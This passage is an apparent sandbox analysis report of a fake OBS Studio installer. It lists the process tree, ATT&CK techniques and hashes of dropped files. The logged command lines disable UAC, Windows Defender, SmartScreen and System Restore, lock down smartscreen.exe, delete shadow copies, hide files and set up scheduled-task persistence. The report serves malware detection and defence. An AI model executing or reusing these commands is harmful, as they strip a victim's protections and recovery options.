AttrIb +s +H C:\Users\Admin\AppData\Roaming\obs-studio\bin\64bit\.cmD
6⤵
- Sets file to hidden
- Views/modifies file attributes
PID:1588

C:\Windows\SysWOW64\attrib.exe
AttrIB +s +h C:\Users\Admin\AppData\Roaming\obs-studio\bin\64bit\.vbs
6⤵
- Sets file to hidden
- Views/modifies file attributes
PID:1980

C:\tmp\obs64.exe
"C:\tmp\obs64.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1088

C:\Users\Admin\AppData\Local\Temp\is-DHJLM.tmp\obs64.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DHJLM.tmp\obs64.tmp" /SL5="$2018C,16149264,140800,C:\tmp\obs64.exe"
6⤵
- Windows security bypass
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
PID:1556

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /f /im obs64.scr
7⤵
PID:1080

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im obs64.scr
8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1432

C:\tmp\obs64.exe
"C:\tmp\obs64.exe" /verysilent /sp-
7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1500

C:\Users\Admin\AppData\Local\Temp\is-H3I5K.tmp\obs64.tmp
"C:\Users\Admin\AppData\Local\Temp\is-H3I5K.tmp\obs64.tmp" /SL5="$80016,16149264,140800,C:\tmp\obs64.exe" /verysilent /sp-
8⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:1612

C:\tmp\obs64.scr
"C:\tmp\obs64.scr"
9⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:340

C:\tmp\obs64.sCr
"C:\tmp\obs64.sCr"
10⤵
- Executes dropped EXE
PID:544

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\d.cmd""
5⤵
- Deletes itself
PID:1996

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\tmp\.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1380

C:\Windows\System32\cmd.exe
cmd /c ""C:\TMP\.CMD" "
2⤵
- Suspicious use of WriteProcessMemory
PID:1112

C:\Windows\system32\reg.exe
reg add "hklm\software\microsoft\windows\currentversion\policies\system" /v "consentpromptbehavioradmin" /t reg_dword /d "0" /f
3⤵
- UAC bypass
PID:1572

C:\Windows\system32\reg.exe
reg add "hklm\software\microsoft\windows\currentversion\policies\system" /v "consentpromptbehavioruser" /t reg_dword /d "0" /f
3⤵
- UAC bypass
PID:1832

C:\Windows\system32\reg.exe
reg add "hklm\software\microsoft\windows\currentversion\policies\system" /v "promptonsecuredesktop" /t reg_dword /d "0" /f
3⤵
- UAC bypass
PID:1536

C:\Windows\system32\reg.exe
reg add "hklm\software\policies\microsoft\windows defender\spynet" /v "submitsamplesconsent" /t reg_dword /d "2" /f
3⤵
PID:1964

C:\Windows\system32\reg.exe
reg add "hklm\software\policies\microsoft\windows defender\spynet" /v "spynetreporting" /t reg_dword /d "0" /f
3⤵
PID:1916

C:\Windows\system32\reg.exe
reg add "hklm\software\policies\microsoft\windows defender" /v "puaprotection" /t reg_dword /d "0" /f
3⤵
PID:948

C:\Windows\system32\reg.exe
reg add "hklm\software\policies\microsoft\windows defender\mpengine" /v "mpenablepus" /t reg_dword /d "0" /f
3⤵
PID:2004

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\system32\smartscreen.exe" /a
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2016

C:\Windows\system32\icacls.exe
icacls "C:\Windows\system32\smartscreen.exe" /reset
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1180

C:\Windows\system32\taskkill.exe
taskkill /im smartscreen.exe /f
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1980

C:\Windows\system32\icacls.exe
icacls "C:\Windows\system32\smartscreen.exe" /inheritance:r /remove *s-1-5-32-544 *S-1-5-11 *s-1-5-32-545 *s-1-5-18
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:972

C:\Windows\system32\reg.exe
reg add "hklm\system\currentcontrolset\control\deviceguard\scenarios\hypervisorenforcedcodeintegrity" /v "enabled" /t reg_dword /d "1" /f
3⤵
PID:1904

C:\Windows\system32\reg.exe
reg add "hklm\software\policies\microsoft\windows\system" /v "enablesmartscreen" /t reg_dword /d "0" /f
3⤵
PID:1620

C:\Windows\system32\reg.exe
reg add "hklm\software\microsoft\windows\currentversion\explorer" /v "smartscreenenabled" /t reg_sz /d "off" /f
3⤵
PID:1736

C:\Windows\system32\reg.exe
reg add "hklm\software\policies\microsoft\mrt" /v "dontofferthroughwuau" /t "reg_dword" /d "1" /f
3⤵
PID:1492

C:\Windows\system32\reg.exe
reg add "hklm\software\policies\microsoft\mrt" /v "dontreportinfectioninformation" /t "reg_dword" /d "1" /f
3⤵
PID:1824

C:\Windows\system32\reg.exe
reg add "hklm\software\policies\microsoft\windows defender\ux configuration" /v "notification_suppress" /t reg_dword /d "1" /f
3⤵
PID:1604

C:\Windows\system32\reg.exe
reg add "hklm\software\policies\microsoft\windows defender\windows defender exploit guard\controlled folder access" /v "enablecontrolledfolderaccess" /t reg_dword /d "0" /f
3⤵
PID:1156

C:\Windows\system32\reg.exe
reg add "hklm\software\policies\microsoft\windows defender\reporting" /v "disableenhancednotifications" /t reg_dword /d "1" /f
3⤵
PID:1224

C:\Windows\system32\reg.exe
reg add "hklm\software\microsoft\windows defender security center\notifications" /v "disableenhancednotifications" /t reg_dword /d "1" /f
3⤵
- Modifies Windows Defender notification settings
PID:1160

C:\Windows\system32\reg.exe
reg add "hklm\software\microsoft\windows defender security center\virus and threat protection" /v "filesblockednotificationdisabled" /t reg_dword /d "1" /f
3⤵
PID:836

C:\Windows\system32\reg.exe
reg add "hklm\software\microsoft\windows defender security center\virus and threat protection" /v "noactionnotificationdisabled" /t reg_dword /d "1" /f
3⤵
PID:1124

C:\Windows\system32\reg.exe
reg add "hklm\software\microsoft\windows defender security center\virus and threat protection" /v "summarynotificationdisabled" /t reg_dword /d "1" /f
3⤵
PID:1528

C:\Windows\system32\reg.exe
reg add "hklm\software\policies\microsoft\windows\explorer" /v "disablenotificationcenter" /t reg_dword /d "1" /f
3⤵
PID:1356

C:\Windows\system32\reg.exe
reg add "hkcu\software\microsoft\windows\currentversion\pushnotifications" /v "toastenabled" /t reg_dword /d "0" /f
3⤵
PID:1472

C:\Windows\system32\reg.exe
reg add "hklm\software\policies\microsoft\windows defender security center\virus and threat protection" /v uilockdown /t reg_dword /d 1 /f
3⤵
PID:432

C:\Windows\system32\reg.exe
reg add "hklm\software\policies\microsoft\windows defender security center\app and browser protection" /v uilockdown /t reg_dword /d 1 /f
3⤵
PID:1184

C:\Windows\system32\reg.exe
reg add "hklm\software\policies\microsoft\windows nt\systemrestore" /v "disableconfig" /t reg_dword /d "1" /f
3⤵
PID:1376

C:\Windows\system32\reg.exe
reg add "hklm\software\policies\microsoft\windows nt\systemrestore" /v "disablesr" /t reg_dword /d "1" /f
3⤵
PID:1380

C:\Windows\system32\reg.exe
reg add "hkcu\software\microsoft\windows\currentversion\policies\attachments" /v "savezoneinformation" /t reg_dword /d "1" /f
3⤵
PID:764

C:\Windows\system32\reg.exe
reg add "hklm\software\microsoft\windows\currentversion\policies\attachments" /v "savezoneinformation" /t reg_dword /d "1" /f
3⤵
PID:1552

C:\Windows\system32\reg.exe
reg add "hklm\software\microsoft\windows\currentversion\policies\attachments" /v "scanwithantivirus" /t reg_dword /d "1" /f
3⤵
PID:832

C:\Windows\system32\icacls.exe
icacls "C:\Users\Admin\AppData\Roaming\microsoft\windows\start menu\programs\startup" /remove:d "everyone" /t /c
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1572

C:\Windows\system32\icacls.exe
icacls "C:\Users\Admin\AppData\Roaming\microsoft\windows\start menu\programs\startup" /deny "everyone":(de,dc) /t /c
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1536

C:\Windows\system32\schtasks.exe
schtasks /create /xml "C:\Users\Admin\AppData\Roaming\obs-studio\bin\64bit\ar.xml" /tn ar /f
3⤵
- Creates scheduled task(s)
PID:1924

C:\Windows\system32\attrib.exe
attrib +s +h C:\Users\Admin\AppData\Roaming\obs-studio
3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:1204

C:\Windows\system32\vssadmin.exe
vssadmin delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:604

C:\Windows\system32\attrib.exe
attrib +s +h C:\tmp
3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:1904

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1160

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20230125084426.log C:\Windows\Logs\CBS\CbsPersist_20230125084426.cab
1⤵
- Drops file in Windows directory
PID:1880

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Hidden Files and Directories

T1158

Scheduled Task

T1053

Privilege Escalation

Bypass User Account Control

T1088

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Bypass User Account Control

T1088

File Deletion

T1107

Hidden Files and Directories

T1158

File Permissions Modification

T1222

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\TMP\.CMD
Filesize
16KB

MD5
47386cc9bb737655d78ae888cafd6168

SHA1
082a6c195ce3cb6cf683484bd3f0c1c468cec6ab

SHA256
74a2dd2c00bd371dfc70131d5364a0f1c64be382503a967b128ee1ec2d5ae7da

SHA512
278a019794200427f6f1deb41bde6f52e794b7e36e9a9e6b687eebf658f710212b1c96b1c9a6c7d956363862e508409860c6306ed38c1f61e3a92d4e8a70371f

Download Submit
C:\Users\Admin\AppData\Local\Temp\d.cmd
Filesize
136B

MD5
bceac8d436db82dd386b048880fa5ecb

SHA1
9932ff00adbab1dd86eaf334c942424c042bb69f

SHA256
5520a9bb6ce16e831b4596d94a96bb61b0bc971493cad8cb69fab4f5489ab95a

SHA512
8829c91a09480755a3d76dfe93292a2652401b757d0f8326a845f9bf5ed35dd5ea133322438f246392a3605543a1ed77ced9a410431ea9d5474b0a3165996959

Download Submit
C:\Users\Admin\AppData\Local\Temp\g.cmd
Filesize
720B

MD5
0f4d0a50bb16322d84e9fac068680502

SHA1
b4e1b0b69bc8b709e37ad19c1cf37cb58b63ccde

SHA256
e56c5fb50aac76941c7ac645cedafbd3577a815bb608582c95f6688f2fb86e54

SHA512
4549a63ad1be40570932fc1e1bc932be438091568c1987be2f362acb6cc38a8268fed1dc43ea28f62666c8b30cfebed1119c22f732ba35254c1e91bba6d93bff

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-BJMRS.tmp\temp\.cmd
Filesize
1KB

MD5
868e3b9060d7700ceb16e57b815104e4

SHA1
057d5fe3db709b50df11c95e0bb90c892c92f866

SHA256
6246fb8e9a1edd361e231f047ff380375136d9e04e64f346f5a72e9f77d4a0cb

SHA512
ee6819fb657206c72895a83954015a4b5a7a8a9666e5b2be082fde0e75366a96310e7daf67e1f9c44843b6ca831e274ec2caceb245354c093822df31b2f688e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-BJMRS.tmp\temp\r.exe
Filesize
764KB

MD5
408dd6ade80f2ebbc2e5470a1fb506f1

SHA1
e00293ce0eb534874efd615ae590cf6aa3858ba4

SHA256
4c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71

SHA512
4dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-BJMRS.tmp\temp\r.exe
Filesize
764KB

MD5
408dd6ade80f2ebbc2e5470a1fb506f1

SHA1
e00293ce0eb534874efd615ae590cf6aa3858ba4

SHA256
4c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71

SHA512
4dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-BJMRS.tmp\temp\r.exe
Filesize
764KB

MD5
408dd6ade80f2ebbc2e5470a1fb506f1

SHA1
e00293ce0eb534874efd615ae590cf6aa3858ba4

SHA256
4c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71

SHA512
4dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-BJMRS.tmp\temp\r.exe
Filesize
764KB

MD5
408dd6ade80f2ebbc2e5470a1fb506f1

SHA1
e00293ce0eb534874efd615ae590cf6aa3858ba4

SHA256
4c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71

SHA512
4dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-BJMRS.tmp\temp\r.exe
Filesize
764KB

MD5
408dd6ade80f2ebbc2e5470a1fb506f1

SHA1
e00293ce0eb534874efd615ae590cf6aa3858ba4

SHA256
4c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71

SHA512
4dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-BJMRS.tmp\temp\r.exe
Filesize
764KB

MD5
408dd6ade80f2ebbc2e5470a1fb506f1

SHA1
e00293ce0eb534874efd615ae590cf6aa3858ba4

SHA256
4c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71

SHA512
4dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-BJMRS.tmp\temp\r.exe
Filesize
764KB

MD5
408dd6ade80f2ebbc2e5470a1fb506f1

SHA1
e00293ce0eb534874efd615ae590cf6aa3858ba4

SHA256
4c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71

SHA512
4dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-BJMRS.tmp\temp\r.exe
Filesize
764KB

MD5
408dd6ade80f2ebbc2e5470a1fb506f1

SHA1
e00293ce0eb534874efd615ae590cf6aa3858ba4

SHA256
4c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71

SHA512
4dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-BJMRS.tmp\temp\r.exe
Filesize
764KB

MD5
408dd6ade80f2ebbc2e5470a1fb506f1

SHA1
e00293ce0eb534874efd615ae590cf6aa3858ba4

SHA256
4c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71

SHA512
4dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-BJMRS.tmp\temp\r.exe
Filesize
764KB

MD5
408dd6ade80f2ebbc2e5470a1fb506f1

SHA1
e00293ce0eb534874efd615ae590cf6aa3858ba4

SHA256
4c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71

SHA512
4dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-BJMRS.tmp\temp\r.exe
Filesize
764KB

MD5
408dd6ade80f2ebbc2e5470a1fb506f1

SHA1
e00293ce0eb534874efd615ae590cf6aa3858ba4

SHA256
4c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71

SHA512
4dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-BJMRS.tmp\temp\r.exe
Filesize
764KB

MD5
408dd6ade80f2ebbc2e5470a1fb506f1

SHA1
e00293ce0eb534874efd615ae590cf6aa3858ba4

SHA256
4c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71

SHA512
4dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-BJMRS.tmp\temp\r.exe
Filesize
764KB

MD5
408dd6ade80f2ebbc2e5470a1fb506f1

SHA1
e00293ce0eb534874efd615ae590cf6aa3858ba4

SHA256
4c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71

SHA512
4dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-BJMRS.tmp\temp\r.exe
Filesize
764KB

MD5
408dd6ade80f2ebbc2e5470a1fb506f1

SHA1
e00293ce0eb534874efd615ae590cf6aa3858ba4

SHA256
4c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71

SHA512
4dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-BJMRS.tmp\temp\r.exe
Filesize
764KB

MD5
408dd6ade80f2ebbc2e5470a1fb506f1

SHA1
e00293ce0eb534874efd615ae590cf6aa3858ba4

SHA256
4c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71

SHA512
4dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-BJMRS.tmp\temp\r.exe
Filesize
764KB

MD5
408dd6ade80f2ebbc2e5470a1fb506f1

SHA1
e00293ce0eb534874efd615ae590cf6aa3858ba4

SHA256
4c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71

SHA512
4dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-DHJLM.tmp\obs64.tmp
Filesize
1.4MB

MD5
d50a6bdcf37d093fc472fcbb6489069a

SHA1
d3f5d6892e4ce3018f8cf441021ace1d9a5b8732

SHA256
4252ef0ec82de8b6634f1b873cbd0a73193bd64dd49cf36f598940817835e10e

SHA512
8304e0211c2f6c96c3d5836175146a6f66a4deba32678e4da6df1715086c19ff6906f48621c472be0247ebd7f18851fc63f72d0657c6b686e1ae9d616c088a4e

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-GA578.tmp\t2_sup5.tmp
Filesize
1.4MB

MD5
a24e73bcea94f3a5f6ce6034dc01e3b3

SHA1
7d44374441a69acb8d29fbfc25e786dbbcab4139

SHA256
118ec78c15f55fb81f6cfc2d2c62268097af3a00cd3d18f1dc30ff4ce06cd44e

SHA512
f05f3fc002cfe2b98ebfebde5c0cb64e436bec9fe6cc1e3cc77fe6505d5ba08e349ed509fd3026a4e1f56d4a1d57e9c108da99740e003b8683d8a460da3a849c

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-GTGTV.tmp\t2_sup5.tmp
Filesize
1.4MB

MD5
a24e73bcea94f3a5f6ce6034dc01e3b3

SHA1
7d44374441a69acb8d29fbfc25e786dbbcab4139

SHA256
118ec78c15f55fb81f6cfc2d2c62268097af3a00cd3d18f1dc30ff4ce06cd44e

SHA512
f05f3fc002cfe2b98ebfebde5c0cb64e436bec9fe6cc1e3cc77fe6505d5ba08e349ed509fd3026a4e1f56d4a1d57e9c108da99740e003b8683d8a460da3a849c

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-H3I5K.tmp\obs64.tmp
Filesize
1.4MB

MD5
d50a6bdcf37d093fc472fcbb6489069a

SHA1
d3f5d6892e4ce3018f8cf441021ace1d9a5b8732

SHA256
4252ef0ec82de8b6634f1b873cbd0a73193bd64dd49cf36f598940817835e10e

SHA512
8304e0211c2f6c96c3d5836175146a6f66a4deba32678e4da6df1715086c19ff6906f48621c472be0247ebd7f18851fc63f72d0657c6b686e1ae9d616c088a4e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\obs.lnk
Filesize
423B

MD5
2c58d59c01c2192208f17c18e14f4964

SHA1
ae2a2456c30db629f215cdf1a006f7fe7a0e332f

SHA256
006d95f9abd1b8f78ff29dc1965c0323c9f2a850f4b57f39e4edda40b890f0d4

SHA512
3ee2eda819c61b291c2f5c22520f9a9dbbbbfd3028fc0292a0c966202e054c000d6476f39c8f2a29628e5d882be7a6b31230cff4d8630a9579590afe4b05d299

Download Submit
C:\Users\Admin\AppData\Roaming\obs-studio\bin\64bit\.cmd
Filesize
186B

MD5
afffe3a76201bab24e3d8d386a350c08

SHA1
52d0648d0a111094106689a98c79feefbce900ec

SHA256
5f3d093e7c36368668ed7350d4e1ab3aab677285505f1b18fc98430c7ef8d3f3

SHA512
4a9c3d2b129e590454dd8e80030b420ceccb03f13e70267bff1733a8cf475c625893859702395aad22f048e03aede5b78a8163f8304e34b64f8733ac19179136

Download Submit
C:\Users\Admin\AppData\Roaming\obs-studio\bin\64bit\.vbs
Filesize
67B

MD5
6229084e8a7b939a67a9cb8f385e9f1a

SHA1
1131557d825c526f066e74ad77bbf6d588ce7408

SHA256
33bfc99196fb169f0ff2f8a83e72a5d47cdb01c9fab7abda154c935b08120e3d

SHA512
a635e61fae2cb486865dfbfd57fa0f80e81108004e814bd50a7f7bc81189238a629a21acd75ec34796f14f50e7f9f0c9a19263a3d03e4a65a27eb6e03fa16fb6

Download Submit
C:\Users\Admin\AppData\Roaming\obs-studio\bin\64bit\ar.xml
Filesize
3KB

MD5
7ff486b05598204237fe9e3ac6703451

SHA1
75e4f1c95179746f7796dbfe39fdfaf6362b0a21

SHA256
31cba67e2887f3e576d0040ab086e84b0596530afca703e4c990b9e402b99b1e

SHA512
41bfe96541eb55b22d329d49b5ae13914ddb5400560bbf02d3f4e207308ed06045f14a8de5c27092b7cc89203dfe140200e72f069b65a44b16afd05393a358a7

Download Submit
C:\tmp\.vbs
Filesize
211B

MD5
f6d7083bea77728d624e8fda51da7965

SHA1
8bfd8154d7c57b94cddd9419ae36ccbcbc3bab97

SHA256
3df3856f21bd818f2c16db064f837c36b647366caf8599bdcf933683f6f8bf99

SHA512
645dab7e20a8f5221ccf66013321abc68cb38dd244b1c92fd128831e89a4089ca86a31857bfb201b5eaec712328c3d1fe558aa133374cf8998cc0af0f9d8ea49

Download Submit
C:\tmp\obs32.dll
Filesize
6.6MB

MD5
0fe444048a4000a3bca0da179b50dc6c

SHA1
4aad3c1318e26e1a4adb26e52cba3699492ea1e3

SHA256
a57d81a4e4f3f7c34c0ce5fe1b5e397ff96f857ba6c1b1aef235401f6ffd5261

SHA512
c164d85ae70fb034062ba4b8521205a2e639f9ad54f883839fb60a2c9c772e89326cad4950d08ec1736d8a555e23d27ae88079fdb5caf0758fe87c74738601ab

Download Submit
C:\tmp\obs64.exe
Filesize
15.9MB

MD5
315048e1d18f5746ae0417a4278ff3ab

SHA1
c083af385df168dff76f4ad7b6c22acc6314f75f

SHA256
c16c484e87513320b820c9dab9e0bf1eab9d324eee87436cf3b3674fc677fcab

SHA512
2960f7f0fe2a92bf9521360915fd8ec3c1daab0e583f76f973273d62e3dc7c13cfd4dd49025bef86085e81384f25101d0d0d210dd2b321239b8f460b9d2c9468

Download Submit
C:\tmp\obs64.exe
Filesize
15.9MB

MD5
315048e1d18f5746ae0417a4278ff3ab

SHA1
c083af385df168dff76f4ad7b6c22acc6314f75f

SHA256
c16c484e87513320b820c9dab9e0bf1eab9d324eee87436cf3b3674fc677fcab

SHA512
2960f7f0fe2a92bf9521360915fd8ec3c1daab0e583f76f973273d62e3dc7c13cfd4dd49025bef86085e81384f25101d0d0d210dd2b321239b8f460b9d2c9468

Download Submit
C:\tmp\obs64.exe
Filesize
15.9MB

MD5
315048e1d18f5746ae0417a4278ff3ab

SHA1
c083af385df168dff76f4ad7b6c22acc6314f75f

SHA256
c16c484e87513320b820c9dab9e0bf1eab9d324eee87436cf3b3674fc677fcab

SHA512
2960f7f0fe2a92bf9521360915fd8ec3c1daab0e583f76f973273d62e3dc7c13cfd4dd49025bef86085e81384f25101d0d0d210dd2b321239b8f460b9d2c9468

Download Submit
C:\tmp\obs64.sCr
Filesize
15.3MB

MD5
a2e4ea727ac977f1a958d0886f7d354e

SHA1
695705eb4878c240bc957d144d9b9efd71efe2cf

SHA256
d5451fe798542c6a9c054cca84031c5ca9da9696bd8ddd2381f9da9f0520fbf3

SHA512
a95158fad8cfb85281cf428a19899de75f1a26eb63fcf3398f38d50a26f3104d44f56511e1ee11aacd064e558bf6454afb095073a0298a32e472973d5f3cecdc

Download Submit
C:\tmp\obs64.scr
Filesize
15.3MB

MD5
a2e4ea727ac977f1a958d0886f7d354e

SHA1
695705eb4878c240bc957d144d9b9efd71efe2cf

SHA256
d5451fe798542c6a9c054cca84031c5ca9da9696bd8ddd2381f9da9f0520fbf3

SHA512
a95158fad8cfb85281cf428a19899de75f1a26eb63fcf3398f38d50a26f3104d44f56511e1ee11aacd064e558bf6454afb095073a0298a32e472973d5f3cecdc

Download Submit
\Users\Admin\AppData\Local\Temp\is-125KL.tmp\_isetup\_shfoldr.dll
Filesize
22KB

MD5
92dc6ef532fbb4a5c3201469a5b5eb63

SHA1
3e89ff837147c16b4e41c30d6c796374e0b8e62c

SHA256
9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

SHA512
9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

Download Submit
\Users\Admin\AppData\Local\Temp\is-125KL.tmp\_isetup\_shfoldr.dll
Filesize
22KB

MD5
92dc6ef532fbb4a5c3201469a5b5eb63

SHA1
3e89ff837147c16b4e41c30d6c796374e0b8e62c

SHA256
9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

SHA512
9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

Download Submit
\Users\Admin\AppData\Local\Temp\is-38IO9.tmp\_isetup\_shfoldr.dll
Filesize
22KB

MD5
92dc6ef532fbb4a5c3201469a5b5eb63

SHA1
3e89ff837147c16b4e41c30d6c796374e0b8e62c

SHA256
9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

SHA512
9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

Download Submit
\Users\Admin\AppData\Local\Temp\is-38IO9.tmp\_isetup\_shfoldr.dll
Filesize
22KB

MD5
92dc6ef532fbb4a5c3201469a5b5eb63

SHA1
3e89ff837147c16b4e41c30d6c796374e0b8e62c

SHA256
9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

SHA512
9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

Download Submit
\Users\Admin\AppData\Local\Temp\is-AGIJ5.tmp\_isetup\_shfoldr.dll
Filesize
22KB

MD5
92dc6ef532fbb4a5c3201469a5b5eb63

SHA1
3e89ff837147c16b4e41c30d6c796374e0b8e62c

SHA256
9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

SHA512
